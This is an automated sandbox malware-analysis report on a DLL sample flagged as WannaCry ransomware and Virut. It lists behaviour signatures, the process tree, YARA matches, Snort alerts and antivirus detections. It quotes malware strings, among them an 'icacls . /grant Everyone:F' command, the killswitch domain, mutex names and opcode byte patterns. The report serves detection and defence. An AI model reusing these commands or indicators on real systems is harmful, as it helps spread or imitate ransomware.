
Windows Analysis Report
FjYNZSPNkt

Overview

General Information

Sample Name:FjYNZSPNkt (renamed file extension from none to dll)
Analysis ID:670186
MD5:9209f16a98096aafd9686e3b0dffef02
SHA1:eef3b058acf4631d573a77ec9fb787d3d876f81d
SHA256:b74df112f9ecc4658a997f870dff5d36b2a8f5df8685da1fb70227395e7eb009
Tags:dllOpenCTIBRSandboxed

Detection

Wannacry, Virut
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Yara detected Virut
Antivirus / Scanner detection for submitted sample
Tries to download HTTP data from a sinkholed server
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Found evasive API chain (may execute only at specific dates)
Writes to foreign memory regions
PE file has a writeable .text section
Changes memory attributes in foreign processes to executable or writable
Tries to evade debugger and weak emulator (self modifying code)
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
Machine Learning detection for dropped file
Creates a thread in another existing process (thread injection)
Tries to resolve many domain names, but no domain seems valid
Drops executables to the windows directory (C:\Windows) and starts them
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6272 cmdline: loaddll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6280 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6300 cmdline: rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • mssecsvc.exe (PID: 6408 cmdline: C:\WINDOWS\mssecsvc.exe MD5: D6F23DCB793C969936142BF9B4F53837)
          • winlogon.exe (PID: 572 cmdline: winlogon.exe MD5: F9017F2DC455AD373DF036F5817A8870)
          • lsass.exe (PID: 612 cmdline: C:\Windows\system32\lsass.exe MD5: 317340CD278A374BCEF6A30194557227)
            • backgroundTaskHost.exe (PID: 4912 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca MD5: B7FC4A29431D4F795BBAB1FB182B759A)
          • fontdrvhost.exe (PID: 708 cmdline: fontdrvhost.exe MD5: 31113981180E69C2773BCADA4051738A)
          • fontdrvhost.exe (PID: 716 cmdline: fontdrvhost.exe MD5: 31113981180E69C2773BCADA4051738A)
          • svchost.exe (PID: 724 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 804 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
            • BackgroundTransferHost.exe (PID: 6784 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
            • backgroundTaskHost.exe (PID: 6420 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca MD5: B7FC4A29431D4F795BBAB1FB182B759A)
          • svchost.exe (PID: 852 cmdline: c:\windows\system32\svchost.exe -k rpcss -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 900 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • dwm.exe (PID: 984 cmdline: dwm.exe MD5: 70073A05B2B43FFB7A625708BB29E7C7)
          • svchost.exe (PID: 1020 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 316 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 416 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 948 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 960 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1132 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1200 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1272 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • rundll32.exe (PID: 6288 cmdline: rundll32.exe C:\Users\user\Desktop\FjYNZSPNkt.dll,PlayGame MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6420 cmdline: rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",PlayGame MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • mssecsvc.exe (PID: 6440 cmdline: C:\WINDOWS\mssecsvc.exe MD5: D6F23DCB793C969936142BF9B4F53837)
        • tasksche.exe (PID: 3908 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 3233ACED9279EF54267C479BBA665B90)
  • mssecsvc.exe (PID: 6580 cmdline: C:\WINDOWS\mssecsvc.exe -m security MD5: D6F23DCB793C969936142BF9B4F53837)
  • svchost.exe (PID: 6636 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6744 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6844 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6900 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6972 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6992 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7024 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3852 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6288 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6700 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Source: FjYNZSPNkt.dll | Rule: WannaCry_Ransomware | Description: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
  • 0x45604:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x353d0:$x3: tasksche.exe
  • 0x455e0:$x3: tasksche.exe
  • 0x455bc:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0x45634:$x5: WNcry@2ol7
  • 0x3543b:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
  • 0x3028:$x7: mssecsvc.exe
  • 0x120ac:$x7: mssecsvc.exe
  • 0x1b3b4:$x7: mssecsvc.exe
  • 0x353a8:$x8: C:\%s\qeriuwjhrf
  • 0x45604:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0x3014:$s1: C:\%s\%s
  • 0x12098:$s1: C:\%s\%s
  • 0x1b39c:$s1: C:\%s\%s
  • 0x353bc:$s1: C:\%s\%s
  • 0x45534:$s3: cmd.exe /c "%s"
  • 0x77a88:$s4: msg/m_portuguese.wnry
  • 0x326f0:$s5: \\192.168.56.20\IPC$
  • 0x1fae5:$s6: \\172.16.99.5\IPC$
  • 0xd195:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
  • 0x78da:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
Source: FjYNZSPNkt.dll | Rule: JoeSecurity_Wannacry | Description: Yara detected Wannacry ransomware | Author: Joe Security
Source: FjYNZSPNkt.dll | Rule: wanna_cry_ransomware_generic | Description: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
  • 0x455e0:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0x45608:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Source | Rule | Description | Author | Strings
Source: C:\Windows\tasksche.exe | Rule: WannaCry_Ransomware | Description: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
  • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0xf4d8:$x3: tasksche.exe
  • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0xf52c:$x5: WNcry@2ol7
  • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xf42c:$s3: cmd.exe /c "%s"
  • 0x41980:$s4: msg/m_portuguese.wnry
  • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
  • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
  • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
Source: C:\Windows\tasksche.exe | Rule: wanna_cry_ransomware_generic | Description: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
  • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Source: C:\Windows\tasksche.exe | Rule: Win32_Ransomware_WannaCry | Description: unknown | Author: ReversingLabs
  • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
  • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
Source: C:\Windows\mssecsvc.exe | Rule: WannaCry_Ransomware | Description: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
  • 0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x3136c:$x3: tasksche.exe
  • 0x4157c:$x3: tasksche.exe
  • 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0x415d0:$x5: WNcry@2ol7
  • 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
  • 0xe048:$x7: mssecsvc.exe
  • 0x17350:$x7: mssecsvc.exe
  • 0x31344:$x8: C:\%s\qeriuwjhrf
  • 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xe034:$s1: C:\%s\%s
  • 0x17338:$s1: C:\%s\%s
  • 0x31358:$s1: C:\%s\%s
  • 0x414d0:$s3: cmd.exe /c "%s"
  • 0x73a24:$s4: msg/m_portuguese.wnry
  • 0x2e68c:$s5: \\192.168.56.20\IPC$
  • 0x1ba81:$s6: \\172.16.99.5\IPC$
  • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
  • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
  • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
  • 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
Source: C:\Windows\mssecsvc.exe | Rule: WannaCry_Ransomware_Gen | Description: Detects WannaCry Ransomware | Author: Florian Roth (based on rule by US CERT)
  • 0x1bacc:$s1: __TREEID__PLACEHOLDER__
  • 0x1bb68:$s1: __TREEID__PLACEHOLDER__
  • 0x1c3d4:$s1: __TREEID__PLACEHOLDER__
  • 0x1d439:$s1: __TREEID__PLACEHOLDER__
  • 0x1e4a0:$s1: __TREEID__PLACEHOLDER__
  • 0x1f508:$s1: __TREEID__PLACEHOLDER__
  • 0x20570:$s1: __TREEID__PLACEHOLDER__
  • 0x215d8:$s1: __TREEID__PLACEHOLDER__
  • 0x22640:$s1: __TREEID__PLACEHOLDER__
  • 0x236a8:$s1: __TREEID__PLACEHOLDER__
  • 0x24710:$s1: __TREEID__PLACEHOLDER__
  • 0x25778:$s1: __TREEID__PLACEHOLDER__
  • 0x267e0:$s1: __TREEID__PLACEHOLDER__
  • 0x27848:$s1: __TREEID__PLACEHOLDER__
  • 0x288b0:$s1: __TREEID__PLACEHOLDER__
  • 0x29918:$s1: __TREEID__PLACEHOLDER__
  • 0x2a980:$s1: __TREEID__PLACEHOLDER__
  • 0x2ab94:$s1: __TREEID__PLACEHOLDER__
  • 0x2abf4:$s1: __TREEID__PLACEHOLDER__
  • 0x2e2c4:$s1: __TREEID__PLACEHOLDER__
  • 0x2e340:$s1: __TREEID__PLACEHOLDER__
Source | Rule | Description | Author | Strings
Source: 00000018.00000000.314054124.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_Virut | Description: Yara detected Virut | Author: Joe Security
Source: 0000000F.00000002.784858800.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_Virut | Description: Yara detected Virut | Author: Joe Security
Source: 00000007.00000002.784858660.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_Virut | Description: Yara detected Virut | Author: Joe Security
Source: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp | Rule: JoeSecurity_Virut | Description: Yara detected Virut | Author: Joe Security
Source: 0000000D.00000002.785329108.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp | Rule: JoeSecurity_Virut | Description: Yara detected Virut | Author: Joe Security
Source | Rule | Description | Author | Strings
Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack | Rule: WannaCry_Ransomware | Description: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
  • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0xf4d8:$x3: tasksche.exe
  • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0xf52c:$x5: WNcry@2ol7
  • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xf42c:$s3: cmd.exe /c "%s"
  • 0x41980:$s4: msg/m_portuguese.wnry
  • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
  • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
  • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack | Rule: wanna_cry_ransomware_generic | Description: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
  • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack | Rule: Win32_Ransomware_WannaCry | Description: unknown | Author: ReversingLabs
  • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
  • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
Source: 4.0.mssecsvc.exe.7100a4.7.unpack | Rule: WannaCry_Ransomware | Description: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
  • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0xf4d8:$x3: tasksche.exe
  • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0xf52c:$x5: WNcry@2ol7
  • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xf42c:$s3: cmd.exe /c "%s"
  • 0x41980:$s4: msg/m_portuguese.wnry
  • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
  • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
  • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
Source: 4.0.mssecsvc.exe.7100a4.7.unpack | Rule: wanna_cry_ransomware_generic | Description: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
  • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
No Sigma rule has matched

Source IP:8.8.8.8
Destination IP:192.168.2.4
Timestamp:07/20/22-17:55:02.126057
SID:2811577
Source Port:53
Destination Port:57546
Protocol:UDP
Classtype:A Network Trojan was detected

Source IP:192.168.2.4
Destination IP:8.8.8.8
Timestamp:07/20/22-17:53:18.256471
SID:2012730
Source Port:60381
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected

Source IP:192.168.2.4
Destination IP:8.8.8.8
Timestamp:07/20/22-17:53:49.518877
SID:2024281
Source Port:56509
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected

Source IP:192.168.2.4
Destination IP:104.16.173.80
Timestamp:07/20/22-17:51:12.245255
SID:2024298
Source Port:49756
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Source IP:104.16.173.80
Destination IP:192.168.2.4
Timestamp:07/20/22-17:51:12.277768
SID:2031515
Source Port:80
Destination Port:49756
Protocol:TCP
Classtype:Misc activity

Source IP:192.168.2.4
Destination IP:8.8.8.8
Timestamp:07/20/22-17:54:08.365418
SID:2024291
Source Port:58171
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected

Source IP:192.168.2.4
Destination IP:8.8.8.8
Timestamp:07/20/22-17:55:12.427931
SID:2012730
Source Port:63284
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected

Source IP:192.168.2.4
Destination IP:8.8.8.8
Timestamp:07/20/22-17:51:12.176394
SID:2024291
Source Port:60506
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected

Source IP:104.17.244.81
Destination IP:192.168.2.4
Timestamp:07/20/22-17:54:08.478476
SID:2031515
Source Port:80
Destination Port:49792
Protocol:TCP
Classtype:Misc activity

Source IP:192.168.2.4
Destination IP:104.17.244.81
Timestamp:07/20/22-17:54:08.444562
SID:2024298
Source Port:49792
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Source IP:8.8.8.8
Destination IP:192.168.2.4
Timestamp:07/20/22-17:54:18.402667
SID:2811577
Source Port:53
Destination Port:52472
Protocol:UDP
Classtype:A Network Trojan was detected

Source IP:8.8.8.8
Destination IP:192.168.2.4
Timestamp:07/20/22-17:54:40.097301
SID:2811577
Source Port:53
Destination Port:50121
Protocol:UDP
Classtype:A Network Trojan was detected

AV Detection

Source: FjYNZSPNkt.dll | Virustotal: Detection: 86%
Source: FjYNZSPNkt.dll | Metadefender: Detection: 78%
Source: FjYNZSPNkt.dll | ReversingLabs: Detection: 96%
Source: FjYNZSPNkt.dll | Avira: detected
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | URL Reputation: Label: malware
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/x | Avira URL Cloud: Label: malware
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | URL Reputation: Label: malware
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/l | Avira URL Cloud: Label: malware
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer | Avira URL Cloud: Label: malware
Source: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | Virustotal: Detection: 12%
Source: C:\Windows\mssecsvc.exe | Avira: detection malicious, Label: W32/Virut.Gen
Source: C:\Windows\tasksche.exe | Avira: detection malicious, Label: TR/FileCoder.AU
Source: C:\Windows\mssecsvc.exe | ReversingLabs: Detection: 96%
Source: C:\Windows\tasksche.exe | Metadefender: Detection: 85%
Source: C:\Windows\tasksche.exe | ReversingLabs: Detection: 95%
Source: FjYNZSPNkt.dll | Joe Sandbox ML: detected
Source: C:\Windows\mssecsvc.exe | Joe Sandbox ML: detected
Source: C:\Windows\tasksche.exe | Joe Sandbox ML: detected
Source: 4.0.mssecsvc.exe.400000.6.unpack | Avira: Label: W32/Virut.Gen
Source: 4.2.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 29.0.tasksche.exe.400000.0.unpack | Avira: Label: TR/FileCoder.AU
Source: 6.0.mssecsvc.exe.7100a4.5.unpack | Avira: Label: TR/FileCoder.AU
Source: 6.0.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 11.0.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 4.2.mssecsvc.exe.400000.0.unpack | Avira: Label: W32/Virut.Gen
Source: 4.0.mssecsvc.exe.400000.0.unpack | Avira: Label: W32/Virut.Gen
Source: 6.2.mssecsvc.exe.400000.0.unpack | Avira: Label: W32/Virut.Gen
Source: 4.0.mssecsvc.exe.400000.2.unpack | Avira: Label: W32/Virut.Gen
Source: 4.0.mssecsvc.exe.400000.4.unpack | Avira: Label: W32/Virut.Gen
Source: 4.0.mssecsvc.exe.7100a4.5.unpack | Avira: Label: TR/FileCoder.AU
Source: 6.0.mssecsvc.exe.7100a4.7.unpack | Avira: Label: TR/FileCoder.AU
Source: 6.0.mssecsvc.exe.400000.2.unpack | Avira: Label: W32/Virut.Gen
Source: 4.0.mssecsvc.exe.7100a4.7.unpack | Avira: Label: TR/FileCoder.AU
Source: 4.0.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 11.2.mssecsvc.exe.400000.0.unpack | Avira: Label: W32/Virut.Gen
Source: 6.0.mssecsvc.exe.7100a4.3.unpack | Avira: Label: TR/FileCoder.AU
Source: 29.2.tasksche.exe.400000.0.unpack | Avira: Label: TR/FileCoder.AU
Source: 6.0.mssecsvc.exe.400000.0.unpack | Avira: Label: W32/Virut.Gen
Source: 6.2.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 4.0.mssecsvc.exe.7100a4.3.unpack | Avira: Label: TR/FileCoder.AU
Source: 6.0.mssecsvc.exe.400000.4.unpack | Avira: Label: W32/Virut.Gen
Source: 11.0.mssecsvc.exe.400000.0.unpack | Avira: Label: W32/Virut.Gen
Source: 11.2.mssecsvc.exe.7100a4.1.unpack | Avira: Label: TR/FileCoder.AU
Source: 6.0.mssecsvc.exe.400000.6.unpack | Avira: Label: W32/Virut.Gen
Source: C:\Windows\tasksche.exe | Code function: 29_2_004018B9 CryptReleaseContext, 29_2_004018B9
Source: FjYNZSPNkt.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL

Networking

Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 20 Jul 2022 15:51:12 GMT | Content-Type: text/html | Content-Length: 607 | Connection: close | Server: cloudflare | CF-RAY: 72dcdb5d9c7e9ba6-FRA | Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 20 Jul 2022 15:54:08 GMT | Content-Type: text/html | Content-Length: 607 | Connection: close | Server: cloudflare | CF-RAY: 72dcdfaacf3c9046-FRA | Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
              Source: TrafficSnort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.4:60506 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.4:49756 -> 104.16.173.80:80
              Source: TrafficSnort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.4:49756
              Source: TrafficSnort IDS: 2012730 ET TROJAN Known Hostile Domain ilo.brenz .pl Lookup 192.168.2.4:60381 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024281 ET TROJAN Known Hostile Domain ant.trenz .pl Lookup 192.168.2.4:56509 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.4:58171 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.4:49792 -> 104.17.244.81:80
              Source: TrafficSnort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.17.244.81:80 -> 192.168.2.4:49792
              Source: TrafficSnort IDS: 2811577 ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) 8.8.8.8:53 -> 192.168.2.4:52472
